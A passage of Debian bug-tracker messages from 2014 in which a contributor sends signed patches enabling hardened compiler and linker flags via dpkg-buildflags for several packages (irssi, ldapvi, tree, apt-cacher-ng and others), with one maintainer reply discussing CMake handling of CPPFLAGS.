m6YERrq6jGzH1r8moD+s1R2rEqeFQfKyoMXl056Azmh/wnAdTE32vTRidU6ThZPK 0nxGBI6zoDcSyXLDF6BDVYKaXnOAE1RpCGCBNsSbOvSy4K4xyESSlMhsxtcO3Vbr 8Uc+Ys5VtyZeU13wNu3fMzoPYosegjuEcLt4SsKS0C5qR465t3ZqBgAOao5OAxIp JGFfy8tYc2/n283ibfIermY1hQi5HBNwieseFlk7t5WJ+ETlcu7EI58WMzQNkz8q R+98X6XJX/W14JwSBscDHscdIg7JnCTGk2lUE66HCRaoF8QYs/d8cpZ4T11WIr22 zorX20wjsoB1qBWvDcex =jRwL -END PGP SIGNATURE- diff -u irssi-0.8.16/debian/rules irssi-0.8.16/debian/rules --- irssi-0.8.16/debian/rules +++ irssi-0.8.16/debian/rules @@ -10,6 +10,8 @@ #export DH_VERBOSE=1 include /usr/share/quilt/quilt.make +DPKG_EXPORT_BUILDFLAGS = 1 +include /usr/share/dpkg/buildflags.mk # These are used for cross-compiling and for saving the configure script # from having to guess our platform (since we know it already) @@ -24,18 +26,6 @@ MAKEFLAGS += -j$(NUMJOBS) endif - - - -CFLAGS = -Wall -g - -ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS))) - CFLAGS += -O0 -else - CFLAGS += -O2 -endif - - CONFIGURE_SWITCHES = --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) \ --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info \ --sysconfdir=/etc \ @@ -50,7 +40,7 @@ dh_testdir # Add here commands to configure the package. dh_autotools-dev_updateconfig - CFLAGS=$(CFLAGS) ./configure $(CONFIGURE_SWITCHES) + $(shell dpkg-buildflags --export=cmdline) ./configure $(CONFIGURE_SWITCHES) build: build-arch build-indep
Bug#761127: Please enable hardened build flags
Package: heirloom-mailx Version: 12.5-2 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Please enable hardened build flags with dpkg-buildflags (patch attached). dpkg-buildflags handle noopt from DEB_BUILD_OPTIONS. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUEMOOAAoJEJmGUYuaqqClvOsP/Rzz/fXy1M8CfhBNT/zMwr43 Vc1F5mBtvxbDZhKtkq0G7CGkmuYysqeVIN7CcK62rBn+nRNTglDsbj3HUfW09dxL Itf1uX6/KMowBecRt0BcjgVdCtIjt+lAqGbWsQXddJ4t3DEyLZzD11/gFyeLihZy 53zRjZ/5xn8vUPPAOMrS8QIuzxmH6xYRjRvwqWcZDfwstdPGCqrIPBhRGZ3sxEjF SkiiFreA/KUQptDB4PwZaOp22c2OfsqPpKmODJ5OHT/Yi5HiBqzG+IbP989ql3P0 fT35w4wgOPdnMsL3HVeGPJ1fB0tKKo9RqMNzoW0ePw1rfqoGDvMdyUrzuFUTHj2d +XDZhG5iLeqvew1r9kyp70skkpR6lz5zELQFkd2jmNEhG4cMC3VhDO1tjWXc/jZ5 9BL/w69ctMLTtj9vRvNv2Iv9I+8MmAUjWIIFRsrSM55r3hipsKr3Tn3sT0jF6pFQ g6VGgueugxE5ZYhcm5FKx5wE4go3I1PA82LfMDX5Sle+mWN84Ri/5AHCCVUzyZdd E1EvD681dThZ9WSye6Ba5tEFIDA/5emlvf7W9nj8Y1Wv7xCcB2iCIIHUT4VFALuv u7CzTyswOjWWAFLbM8WZZ+75YRKPg6I4Kw7TGud7mQnzkjN7yhjOqZestC4XsSs0 F/DzETpQGwvHcV8JrxXF =uy6g -END PGP SIGNATURE- diff -Nru heirloom-mailx-12.5/debian/changelog heirloom-mailx-12.5/debian/changelog --- heirloom-mailx-12.5/debian/changelog 2012-04-14 20:25:21.0 +0200 +++ heirloom-mailx-12.5/debian/changelog 2014-09-10 23:25:46.0 +0200 @@ -1,3 +1,10 @@ +heirloom-mailx (12.5-2.1) unstable; urgency=medium + + * Non-maintainer upload. + * Use dpkg-buildflags and pass *FLAGS to Makefile + + -- Guillaume Delacour g...@iroqwa.org Wed, 10 Sep 2014 23:16:59 +0200 + heirloom-mailx (12.5-2) unstable; urgency=low * now Provides: mail-reader (Closes: #663384), imap-client diff -Nru heirloom-mailx-12.5/debian/rules heirloom-mailx-12.5/debian/rules --- heirloom-mailx-12.5/debian/rules 2012-04-14 20:21:44.0 +0200 +++ heirloom-mailx-12.5/debian/rules 2014-09-10 23:24:08.0 +0200 @@ -5,13 +5,10 @@ # Uncomment this to turn on verbose mode. #export DH_VERBOSE=1 -CFLAGS=-Wall -g - -ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS))) - CFLAGS+=-O0 -else - CFLAGS+=-O2 -endif +CPPFLAGS=$(shell dpkg-buildflags --get CPPFLAGS) +CFLAGS=$(shell dpkg-buildflags --get CFLAGS) +CFLAGS+=-Wall +LDFLAGS=$(shell dpkg-buildflags --get LDFLAGS) build: build-arch build-indep build-arch: build-stamp @@ -22,7 +19,8 @@ $(MAKE) \ PREFIX=/usr \ CFLAGS=$(CFLAGS) \ - CPPFLAGS=-D_GNU_SOURCE \ + CPPFLAGS=$(CPPFLAGS) -D_GNU_SOURCE \ + LDFLAGS=$(LDFLAGS) \ UCBINSTALL=/usr/bin/install \ IPv6=-DHAVE_IPv6_FUNCS \ STRIP=true
Bug#761129: Please enable hardened build flags
Package: ldapvi Version: 1.7-9 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, Please enable hardened build flags with dpkg-buildflags (patch attached). dpkg-buildflags handle noopt from DEB_BUILD_OPTIONS. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUEMjIAAoJEJmGUYuaqqClMQsP/0FpUBQ9i8mUnuCEj7ahucsc +CY+8g9OseRjGZd5fIroePSbJOsGTsxIzz/ZsWNPqrN5xl7pLjZCGXV5t/8WBnWS Yq+o00gdIbWgP7sr1kJ/J0DJLieOyL8gGtwl7pO7KYov3bCq6AToRNE9KB6ubFBz Geg3uD0sHrzAcjRkq0trDowa4xIzZ8+3Sk0+/UTqgIkXykX8W6/GzSUbzrQlWOUN VQY4x5jd/mxUCCaQPvCdBkBmMvvB8Nhlp5TwZSGQ83jRM+mDxLEtZ0TPtniDHMtE 1o17PtsvLqOW3/1fnKq4/B7W3xgLnJ4yGKwCl/EfHOUDz2uF8KRbdJ6KPjK70BHB wWghZtnSy6qjXFwTgBNIH1xHWxZ0HqY7Rlrki1R+c1kCqFW2PaaW9514hpbOdW/+ ntMmuKtcybDEonah9aAyRxpMuZoWw+49KOF6rChbgSTXKRvWwWkabR0X+/xcevAS Vc9n4+F/Dt5aqu3xImIXwgwqzeSWVhenY6DpTF29o+cxh+pR53GQc5ZUGp1lanhE hqhMR8ruRbzjZNG5yEvv1z62IRwa8PUKp1VrAizUOfVkFmyiBAYFetmtH1zFSiAa VygyfzraeKxnNA5xyKhILLfgHcIHGmRAgcGcA14PqcYhV7QLAqSAlUMBREV4d9U/ 93y8L0e1B3NkqBvvIkk8 =qjhd -END PGP SIGNATURE- diff -u ldapvi-1.7/debian/changelog ldapvi-1.7/debian/changelog --- ldapvi-1.7/debian/changelog +++ ldapvi-1.7/debian/changelog @@ -1,3 +1,11 @@ +ldapvi (1.7-9.1) unstable; urgency=medium + + * Non-maintainer upload. + * Use dpkg-buildflags and pass *FLAGS to configure + * Remove compilation generated files (config.status, GNUmakefile, config.h) + + -- Guillaume Delacour g...@iroqwa.org Wed, 10 Sep 2014 23:40:05 +0200 + ldapvi (1.7-9) unstable; urgency=low * Use fileencoding instead of encoding in vim modeline which makes recent diff -u ldapvi-1.7/debian/rules ldapvi-1.7/debian/rules --- ldapvi-1.7/debian/rules +++ ldapvi-1.7/debian/rules @@ -11,17 +11,15 @@ DEB_HOST_GNU_TYPE ?= $(shell dpkg-architecture -qDEB_HOST_GNU_TYPE) DEB_BUILD_GNU_TYPE ?= $(shell dpkg-architecture -qDEB_BUILD_GNU_TYPE) -CFLAGS = -Wall -g +CFLAGS=$(shell dpkg-buildflags --get CFLAGS) +CFLAGS += -Wall +CPPFLAGS=$(shell dpkg-buildflags --get CPPFLAGS) +LDFLAGS=$(shell dpkg-buildflags --get LDFLAGS) INSTALL = install INSTALL_FILE= $(INSTALL) -p-oroot -groot -m644 INSTALL_PROGRAM = $(INSTALL) -p-oroot -groot -m755 INSTALL_SCRIPT = $(INSTALL) -p-oroot -groot -m755 INSTALL_DIR = $(INSTALL) -p -d -oroot -groot -m755 -ifneq (,$(filter noopt,$(DEB_BUILD_OPTIONS))) - CFLAGS += -O0 -else - CFLAGS += -O2 -endif ifeq (,$(filter nostrip,$(DEB_BUILD_OPTIONS))) INSTALL_PROGRAM += -s STRIP = true @@ -47,12 +45,14 @@ cp -a configure configure.save [ ! -f Makefile ] || $(MAKE) distclean mv configure.save configure + # Remove compilation generated files + rm -f config.status GNUmakefile config.h build: build-stamp build-stamp: patch-stamp $(checkdir) - CFLAGS=$(CFLAGS) ./configure --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info --with-libcrypto=none + CFLAGS=$(CFLAGS) CPPFLAGS=$(CPPFLAGS) LDFLAGS=$(LDFLAGS) ./configure --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info --with-libcrypto=none $(MAKE) cd manual $(MAKE) manual.html touch build-stamp
Bug#761133: Hardening options incomplete (LDFLAGS)
Source: log4cplus Version: 1.0.4-1.1 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, As you define LDFLAGS, the default exported LDFLAGS is missing (relro). I also enable parallel build to speed up when you have more than one cpu. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUEM9JAAoJEJmGUYuaqqClG/AP/1PK+oMCSXt2y91h+Fpd+0OY LDYbmHJjOTiYWeOm2Mbs9j4ByP1/0Er+tKWKwewI332yiRDeykSfsKK5vEERUXQD dbC3ChDOPL1m+AZdEP5y9dvFWv/2UiiNn761hU/TcaHI1pLX6fk+yyE9Ozpdud1T wnqCmX51cQua/lwRlckIeJGBcexX3Lq/n0ROLFMNP6ekmfImtqPaMoQYuaGnxii7 q7Wa18Fly7EOkbVYRv+jXgCvSDcgTGBQozfAgNEBT/Oi2IZA8z3B2k3DfThHXbpv jzJDg0xrhAdDH7HepQYVoVI/JWuWXtTjtBL41t4nCpOHtF6fQwix/xGTmo6C4tSV vFDjMlnVrqbGJLfoJ0CNGj+7HGE4Q4ABPZuAhKN/b3M6zl6oekXkbCN9b8Bsi3wE bDjUscHRwXWNh72UXb8lAVnB+yztjQgbFcNFlR1OBVwB8kUcTsiqOrJLcl+VTFDz CaM7HR1hy0TWbG5J8or9rxERhSWBc9YllyNxEWQreDOYQ9B6WTas12XjxpyvspUi 3p8qHSfOTST2yra+6ZQQhkGRZ4WJ4Hr44hNnHa9t+7xWTMSqVe9a2IEjSmjrZxYv 1EDYWeOdWkBKWBDmGecs2tAvwiAqZBDWooAZdaLM4V5uiKJbVtIGphcXzccWnXfq g+IDMhFTKfLhRZwAeGIU =YB8x -END PGP SIGNATURE- diff -Nru log4cplus-1.0.4/debian/changelog log4cplus-1.0.4/debian/changelog --- log4cplus-1.0.4/debian/changelog 2014-06-29 08:23:00.0 +0200 +++ log4cplus-1.0.4/debian/changelog 2014-09-11 00:15:39.0 +0200 @@ -1,3 +1,11 @@ +log4cplus (1.0.4-1.2) unstable; urgency=medium + + * Non-maintainer upload. + * Use exported LDFLAGS (relro) in DEB_CONFIGURE_SCRIPT_ENV + * Enable parallel build + + -- Guillaume Delacour g...@iroqwa.org Thu, 11 Sep 2014 00:08:42 +0200 + log4cplus (1.0.4-1.1) unstable; urgency=low * Non-maintainer upload. diff -Nru log4cplus-1.0.4/debian/rules log4cplus-1.0.4/debian/rules --- log4cplus-1.0.4/debian/rules 2012-01-19 07:26:19.0 +0100 +++ log4cplus-1.0.4/debian/rules 2014-09-11 00:09:50.0 +0200 @@ -8,8 +8,12 @@ #install/liblog4cplus:: +ifneq (,$(filter parallel=%,$(DEB_BUILD_OPTIONS))) + NUMJOBS = $(patsubst parallel=%,%,$(filter parallel=%,$(DEB_BUILD_OPTIONS))) + MAKEFLAGS += -j$(NUMJOBS) +endif -DEB_CONFIGURE_SCRIPT_ENV += LDFLAGS=-Wl,-z,defs -Wl,--as-needed -lpthread +DEB_CONFIGURE_SCRIPT_ENV += LDFLAGS=-Wl,-z,defs -Wl,--as-needed -lpthread $(LDFLAGS) DEB_DH_INSTALL_SOURCEDIR := debian/tmp binary-install/liblog4cplus-dev::
Bug#760726: Please enable hardened build flags
Package: squidguard Version: 1.5-2+b1 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, Please find attached a patch that enable hardening build flags in your package. The upstream test suite run after the build confirm the good execution of the binary. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUDDGnAAoJEJmGUYuaqqClURsP+gMD8tb1Et4Lfq28++EFMXcK blclzUZAQpaNvjxMEeMEJ9QIUEM4oXcW+EvVdku5ir+CdANBXb00ESmeoqzRnjOC u/fVcLjrzo4CgaN4nYLWPmVyNz0HGVbuayd6JDoPoHI8I5scGEuVMp0w+TRU8xTB vwIcZl4H2kyCsiN18oWyD7n/lo1MHFByG2rJ1NIoIDtLm8K4RQAOJr0Lt9D9wsHA FsHfJSXc6JDPzQ1B++tXqbYU+UbOk8BUB+ZDyowPco3dhv/tEOXeCwy2uNjNSTZY DsCE3CP9mp5Zg0Z3U7oiwhQHFm0159BRv0PED9QL5zYfeVKmG6lhtnXF3g3LIJD/ 4LGamn+Ub/6beph3GM7gpo9s/cJhOEmctKabNBwJZXVGT/NThqoDs6qwgIQohcGm 6W2Ma3Uyl81MboyGFAW/e06fTJGYOa89qpmKDDua/0MG2xJZMlFXu6bRLeQnVF9P 7coN/j5VVbLcP6k1XY8AV5N9RJUxq/aWhEXFXjB7jV7axgM8dWUfLvNKFFc/j4aZ xUd3fWyWr/HXVf7mRXikvXeMpfQp+wT4+QYoU8ywFIrDUF8MS/SaGHkdOZkQ91Dd mcDX0ZU/aZAgoLf/lD9Keu9kggq9yhkzLESQVcxuHYQLht0HuR3BQyYLcSIf60HZ Cns45Y69IiNoX5KR24J3 =M/jO -END PGP SIGNATURE- diff -Nru squidguard-1.5/debian/changelog squidguard-1.5/debian/changelog --- squidguard-1.5/debian/changelog 2014-01-24 21:52:43.0 +0100 +++ squidguard-1.5/debian/changelog 2014-09-07 11:22:24.0 +0200 @@ -1,3 +1,10 @@ +squidguard (1.5-2.1) unstable; urgency=medium + + * Non-maintainer upload. + * Pass hardened flags through dpkg-buildflags to configure + + -- Guillaume Delacour g...@iroqwa.org Sun, 07 Sep 2014 11:21:46 +0200 + squidguard (1.5-2) unstable; urgency=low * Fix small typo in update-squidguard. diff -Nru squidguard-1.5/debian/rules squidguard-1.5/debian/rules --- squidguard-1.5/debian/rules 2014-09-07 11:21:09.0 +0200 +++ squidguard-1.5/debian/rules 2014-09-07 11:22:54.0 +0200 @@ -1,11 +1,14 @@ #!/usr/bin/make -f # -*- makefile -*- +export DEB_BUILD_MAINT_OPTIONS = hardening=+all + %: dh $@ override_dh_auto_configure: - dh_auto_configure -- --with-db=/usr \ + dh_auto_configure -- $(shell dpkg-buildflags --export=configure) \ + --with-db=/usr \ --with-ldap=yes --with-ldap-lib=/usr/lib \ --with-sg-config=/etc/squidguard/squidGuard.conf \ --with-sg-logdir=/var/log/squidguard \
Bug#760749: CPPFLAGS unused
Package: tree Version: 1.7.0-1 Severity: normal Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, Your package doesn't use CPPFLAGS (as upstream Makefile) at build time. Please find attached a patch that fix that. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUDGFnAAoJEJmGUYuaqqCl8kUP/iaTkj++QLOeLQzNe7xykRp9 dY9Zyer+BweOmyOVfRqgCdU+c0G6RuythWFpcb0K6RLxC//theITenLvEJkiyKgU mfq16CNtITKQ3PKBMu42yIYG2oz74RwGDARWtpaSAW/i+0SZdQLvp/L+U53ZKbUJ dnsdA63b+ooots7YtXYv+XNYMUx+afb0BxZ6XxXV8L+eKUHMQQrsEVubCGnmPMfB YeMIcBAH75+1V3gmdgzobkY5/0v9upkkktBEJrkcmDDeJZvfCwxo60iyRXdF99S2 PPQw43zxbQ2f8WSWrkTPEDNeV0HEmgNbQtUzWOq/rqC3Vz69Ie2Ayi304hjv+bUa AKpT73ZJcukkJd0cjUS7p9jhpZT/z3qdFqLhORKdDTANEQTWWOwFlkbdnWJFBrdA G2DVb5qSumDwwfsPCFZGPiIq8NFT5PVMpErAKg+GnYWHrVqwZWtNv4VZPNn5YEob w77fMHFh5YA3TuLPq3meoF0xP8p6D42nm0GpsUoV2mbJP8MZXE4Ky4XKZP9VbW3R CUc41AouKenzdshXzRT5aYYq3DhZSaHfSCWFu6UlnacUasVDGM5IsCnnnI8NsKzl b6Ff5lgrNtDzNLgZVrZ3SBKIMIPia/ftTnJNzT++3+9LbAngEh2SbK3DkBMoRl4G 9Ma5dFwjvgjJfxcuMqEq =siJ/ -END PGP SIGNATURE- diff -Nru tree-1.7.0/debian/changelog tree-1.7.0/debian/changelog --- tree-1.7.0/debian/changelog 2014-04-27 10:34:34.0 +0200 +++ tree-1.7.0/debian/changelog 2014-09-07 15:24:21.0 +0200 @@ -1,3 +1,11 @@ +tree (1.7.0-1.1) unstable; urgency=medium + + * Non-maintainer upload. + * Pass CPPFLAGS at build time (enable D_FORTIFY_SOURCE), patch upstream Makefile + * Remove generated binary in clean + + -- Guillaume Delacour g...@iroqwa.org Sun, 07 Sep 2014 15:11:27 +0200 + tree (1.7.0-1) unstable; urgency=medium * [63b3dfd] Imported Upstream version 1.7.0 (Closes: #745776) diff -Nru tree-1.7.0/debian/patches/cppflags.diff tree-1.7.0/debian/patches/cppflags.diff --- tree-1.7.0/debian/patches/cppflags.diff 1970-01-01 01:00:00.0 +0100 +++ tree-1.7.0/debian/patches/cppflags.diff 2014-09-07 15:18:02.0 +0200 @@ -0,0 +1,17 @@ +Author: Guillaume Delacour g...@iroqwa.org +Subject: Use CPPFLAGS in upstream Makefile +Last-Update: 2014-09-07 + +Index: tree-1.7.0/Makefile +=== +--- tree-1.7.0.orig/Makefile tree-1.7.0/Makefile +@@ -87,7 +87,7 @@ tree: $(OBJS) + $(CC) $(LDFLAGS) -o $(TREE_DEST) $(OBJS) + + $(OBJS): %.o: %.c tree.h +- $(CC) $(CFLAGS) -c -o $@ $ ++ $(CC) $(CFLAGS) $(CPPFLAGS) -c -o $@ $ + + clean: + if [ -x $(TREE_DEST) ]; then rm $(TREE_DEST); fi diff -Nru tree-1.7.0/debian/patches/series tree-1.7.0/debian/patches/series --- tree-1.7.0/debian/patches/series 2014-04-27 10:34:34.0 +0200 +++ tree-1.7.0/debian/patches/series 2014-09-07 15:12:45.0 +0200 @@ -1 +1,2 @@ PATH_MAX +cppflags.diff diff -Nru tree-1.7.0/debian/rules tree-1.7.0/debian/rules --- tree-1.7.0/debian/rules 2014-04-27 10:34:34.0 +0200 +++ tree-1.7.0/debian/rules 2014-09-07 15:23:01.0 +0200 @@ -17,10 +17,14 @@ CFLAGS += -Wall -DLINUX -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64 override_dh_auto_build: - $(MAKE) CFLAGS=$(CFLAGS) LDFLAGS=$(LDFLAGS) + $(MAKE) CFLAGS=$(CFLAGS) LDFLAGS=$(LDFLAGS) CPPFLAGS=$(CPPFLAGS) override_dh_auto_install: $(MAKE) install prefix=$(prefix) MANDIR=$(MANDIR) +override_dh_clean: + dh_clean + rm -f tree + %: dh $@
Bug#760699: Hardened build flags not fully enabled
Le dimanche 07 septembre 2014 à 03:40 +0200, Guillaume Delacour a écrit : Package: apt-cacher-ng Version: 0.7.27-1 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening Hello, Please find attached a patch that enable all hardening flags in your package. Although apt-cacher-ng use dh/9, CPPFLAGS (fortify) was not enabled. Besides since debhelper 0.9.20120417 handle the workaround appending CPPFLAGS to CXXFLAGS, i still had to do (i've not investigated though). I've also enabled the optionals pie and bindnow. debhelper must handle the situation (/usr/share/perl5/Debian/Debhelper/Buildsystem/cmake.pm, sub configure) and enable verbose compiler command lines, there is a problem somewhere (due to package or in debhelper itself). As it concerns some other packages, i'll take a look and report back. After the build i've made some tests (apt-get update apt-get install $package through apt-cacher-ng) which confirm that it won't break anything (at least at first glance). Finally, i've made the build verbose to let blhc see if all flags are enabled in the future. -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#760699: Hardened build flags not fully enabled
Le dimanche 07 septembre 2014 à 21:35 +0200, Eduard Bloch a écrit : Hallo, * Guillaume Delacour [Sun, Sep 07 2014, 08:54:13PM]: Le dimanche 07 septembre 2014 à 03:40 +0200, Guillaume Delacour a écrit : Package: apt-cacher-ng Version: 0.7.27-1 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening Hello, Please find attached a patch that enable all hardening flags in your package. Although apt-cacher-ng use dh/9, CPPFLAGS (fortify) was not enabled. Besides since debhelper 0.9.20120417 handle the workaround appending CPPFLAGS to CXXFLAGS, i still had to do (i've not investigated though). I've also enabled the optionals pie and bindnow. debhelper must handle the situation (/usr/share/perl5/Debian/Debhelper/Buildsystem/cmake.pm, sub configure) and enable verbose compiler command lines, there is a problem somewhere (due to package or in debhelper itself). As it concerns some other packages, i'll take a look and report back. Uhm... I have a wrapper GNUMakefile there for convenience, which builds the source out-of-source-tree and also extends CXXFLAGS as needed. Maybe that's the reason why tweaking CMake internal variables is not really effective. And I guess that this method is not uncommon since CMake tends to be very messy and the best way to get reproducible builds actually to make OOST builds and wipe the directory on cleaning. This is exactly the reason why debhelper does not consider a real cmake build system because of the presence of GNUmakefile. To have a verbose build instead of dh_auto_build -- VERBOSE=1: export CMAKEOPTS+=-DCMAKE_VERBOSE_MAKEFILE=ON Do the job but when the fortify flag disappear (!). For CPPFLAGS (which is ignored by CMake itself) i tried different methods such as: include /usr/share/dpkg/buildflags.mk CFLAGS+=$(CPPFLAGS) CXXFLAGS+=$(CPPFLAGS) Another one: export CMAKEOPTS+=-DCMAKE_VERBOSE_MAKEFILE=ON -DCMAKE_C_FLAGS_RELWITHDEBINFO:STRING=$(CXXFLAGS) -D_FORTIFY_SOURCE=2 With no success. Anyway, the first patch works (but maybe need some documentation about the special usecase) but feel free to do different, the goal is to enable all build flags dynamically through dpkg-buildflags to handle future compiler options and have a verbose build (mean full compiler command lines) to check presence of flags in buildd logs. You can use hardening-wrapper (from hardening-includes package) to test the generated binary against flags: $ hardening-check build/apt-cacher-ng build/apt-cacher-ng: Position Independent Executable: yes Stack protected: yes Fortify Source functions: yes (some protected functions found) Read-only relocations: yes Immediate binding: yes Regards, Eduard. -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#760792: Enable verbose build
Package: minidlna Version: 1.1.2+dfsg-1.1+b1 Severity: minor Tags: patch -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hi, configure is call directly from override_dh_auto_configure in debian/rules, which overwrites all other options (such as - --disable-silent-rules) passed via debhelper. Unless there is a good reason to do that, please consider pass overriden options instead, this let the possibilyt to enable verbose build to detect compiler build flags on buildd. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUDMqdAAoJEJmGUYuaqqClGbMP+gLt9PTik0DgCienNpImiA/k HzP7Drh3H6Z6oKz2MdI+5ZdV3LPAVaxZ88e42t/spfzkt4l1uG6BNw7hfah44a5Y H7nVcea7X1ryW40v8WQPpOgDNGcHBGgy54iPBFMqC5zNSjZ16ensysMEJKAdKkiv WrPtNuR3TY/5vMGB+pIRFFDkASUjKnsbcry0hkOkPbZ/CwlJ4CCbWHCFfNacrz2j Znv3q+GKXYZs7ycWn+H0w0tMPV4r4deAXtULzxEJcT/DQZjGChLhMWZpsmgNMBvD vK5bo9IZBQpEWFwODwobyab3VCsybCg/fvOZRT9fbKxSCvwkeNbku2siQ2jCXxqk NIWidEKfC9sGXdYnIIFdYEic9qat5tPfpDZ6rSW02FBlA/klLAkLY0k4Vacuc0lR 80sjkGHtXzBjN2pqpHBpSTvmc04JqltW1DEpkJ4ThmRCajQacV/Yn1GRj8K4QdSQ UGh24yUEe1JOjMVcVYjUEokZJWXiC82oYGUvTsP5ZvQNEg82PNNjPnoNmBxtsar8 Czb1mEd7mjWeumJdNdY6KI2GtiPkhQwbjggqB/lKK+dkhh4ZJlEpa77IGUYn3wCs shW/iHbmnMUx+CT2CnxG/6w7+L44wBruihdXZDvsE/dLVJMK7XLUaOafAFoEjfR/ zRmSd0YKt08su9G4VWDl =87Rp -END PGP SIGNATURE- diff -Nru minidlna-1.1.2+dfsg/debian/changelog minidlna-1.1.2+dfsg/debian/changelog --- minidlna-1.1.2+dfsg/debian/changelog 2014-06-16 12:01:30.0 +0200 +++ minidlna-1.1.2+dfsg/debian/changelog 2014-09-07 23:02:03.0 +0200 @@ -1,3 +1,12 @@ +minidlna (1.1.2+dfsg-1.2) unstable; urgency=medium + + * Non-maintainer upload. + * Don't call ./configure directly but pass overriden options to +dh_auto_configure instead; this make possible to enable verbose build on +buildd + + -- Guillaume Delacour g...@iroqwa.org Sun, 07 Sep 2014 22:49:35 +0200 + minidlna (1.1.2+dfsg-1.1) unstable; urgency=medium * Non-maintainer upload. diff -Nru minidlna-1.1.2+dfsg/debian/rules minidlna-1.1.2+dfsg/debian/rules --- minidlna-1.1.2+dfsg/debian/rules 2014-04-28 22:33:25.0 +0200 +++ minidlna-1.1.2+dfsg/debian/rules 2014-09-07 23:02:15.0 +0200 @@ -9,7 +9,7 @@ dh $@ --with autoreconf override_dh_auto_configure: - ./configure --prefix=$(PREFIX) --sbindir=$(PREFIX)/bin + dh_auto_configure -- --prefix=$(PREFIX) --sbindir=$(PREFIX)/bin override_dh_installchangelogs: dh_installchangelogs NEWS
Bug#760699: Hardened build flags not fully enabled
Package: apt-cacher-ng Version: 0.7.27-1 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, Please find attached a patch that enable all hardening flags in your package. Although apt-cacher-ng use dh/9, CPPFLAGS (fortify) was not enabled. Besides since debhelper 0.9.20120417 handle the workaround appending CPPFLAGS to CXXFLAGS, i still had to do (i've not investigated though). I've also enabled the optionals pie and bindnow. After the build i've made some tests (apt-get update apt-get install $package through apt-cacher-ng) which confirm that it won't break anything (at least at first glance). Finally, i've made the build verbose to let blhc see if all flags are enabled in the future. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUC7d3AAoJEJmGUYuaqqClvoQP/i9rbzn23sH9w9T4Xo9R4BnO KbkIth35qiy13mj+X2ryS4L7arrCGZkCmGDM/Cd//CY5DiuoSrsXQvE8yfWHOd1n EZ9TIt5ksJkrrfFLcHyJefwqCwD+k/hEQ6s0h3qUml8BTQPvnOGw0ZiquuT0j8Mj Zn0HnIxxbpI8qcElQsQVRPK2EBmPMd/BGxTJPjlCITVxfTt8StZqPr+8zv+ScWx7 IpKwLsZWIFeFQsI1UUSVlYo9fjUgc+LJTvFLMfowYRGfVmptsxuyFgzEW6bvBvV9 NurWIDVtGisZLLQVati0P3/grJmWLk3gqGBvTBk56cBLtO7QzKULQ9ZbkO99cHh8 4yjjil2ziXrGU85wTjSjWPkkyx1CtbTm7eyE/10SiSKjhp5M7TbWyjIuAjOlrysB 9uJQ9iIrxyoYDoyorTwju80jo4dlmPCBLdbuDnl6nQC+vPS/GTXVj9H7m7n1KHdB TvDa1GqvJaJevYT+Nvm4kc4n1FIpWry64Dgd8wroV16zUFU04MFfdO6oIEX9q8f0 8jn0+OOs42pZXFVp7SycR/qLd7o6/HDIqNi/6LQCwOqWGk1HK0bq3gqHKLwY099U bXY1Lem/pkyp+WrFhhIsQpvGtgMpkiYgTs4PPqUdDJaCTsffP93YHgpaoKZJ00/l Ouj5qQrm72NJjl0Y+K3E =ylIF -END PGP SIGNATURE- diff -Nru apt-cacher-ng-0.7.27/debian/rules apt-cacher-ng-0.7.27/debian/rules --- apt-cacher-ng-0.7.27/debian/rules 2014-07-17 21:35:38.0 +0200 +++ apt-cacher-ng-0.7.27/debian/rules 2014-09-07 02:55:35.0 +0200 @@ -3,9 +3,16 @@ TGT=$(CURDIR)/debian/apt-cacher-ng CDIR=$(TGT)/etc/apt-cacher-ng +export DEB_BUILD_MAINT_OPTIONS = hardening=+all +# cmake doesn't follow CPPFLAGS, see #653916 +CXXFLAGS+=$(CPPFLAGS) + %: dh $@ --parallel --with systemd +override_dh_auto_build: + dh_auto_build -- VERBOSE=1 + override_dh_install: dh_install $(test -e build/acngfs || echo -Xacngfs) cp systemd/apt-cacher-ng.service debian
Bug#760567: Use dpkg-buildflags
